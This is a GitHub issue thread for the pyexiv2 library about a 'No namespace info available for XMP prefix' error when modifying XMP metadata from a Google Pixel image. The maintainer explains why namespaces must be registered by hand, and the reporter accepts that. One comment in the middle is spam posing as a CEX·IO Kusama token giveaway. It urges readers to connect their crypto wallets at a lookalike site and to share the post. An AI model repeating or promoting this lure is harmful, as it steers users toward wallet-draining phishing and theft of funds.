### ISSUE TITLE
Auto register additional XMP namespaces

### ISSUE THREAD

**Issue by molexx** [LeoHsiao1/pyexiv2#128]
For some images when modifying XMP data using the dict the call to `modify_xmp()` raises something like:
```
RuntimeError: No namespace info available for XMP prefix `Item'
```
Manually adding a call to `registerNs()` fixes this. 

Perhaps pyexiv2 could automatically register any namespaces it encounters during `read_xmp()` please?

Here's a breaking example, `GooglePixel8.jpg` is from https://exiftool.org/Google.tar.gz

```
import pyexiv2

with pyexiv2.Image("GooglePixel8.jpg") as pyexiv2_imagedata:

    # read xmp data as a dict
    xmp_dict = pyexiv2_imagedata.read_xmp()

    xmp_raw = pyexiv2_imagedata.read_raw_xmp()
    print('xmp_raw:\n' + xmp_raw)

    # uncomment the below to pass
    # pyexiv2.registerNs('http://ns.google.com/photos/1.0/container/item/', 'Item')

    # write the xmp dict back to the ImageData
    pyexiv2_imagedata.modify_xmp(xmp_dict)
```

**Comment by LeoHsiao1** [comment]
Hi!
According to the documentation <https://exiv2.org/manpage.html#78-xmp-namespaces> , exiv2 has standards defined prefixes and namespaces built-in.
So this kind of error reporting, `No namespace info available for XMP prefix`, can remind users to check that they are writing the correct key. For example, some users may write EXIF, IPTC key when calling `img.modify_xmp()`.
Therefore, I prefer to ask the user to manually call `img.registerNs()`.

Similarly, when the user modifies EXIF or IPTC metadata, exiv2 does not allow writing non-standard keys or even registering custom keys.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by molexx** [comment]
Thanks.
The copy works and standard keys can be updated using the dict so I'm good for now. 

At some point in the future I'm going to need to let a user edit any of the existing fields, and it'll be easier to use the dict rather than the XML for that, so when I get to that point I'll implement something as described above.
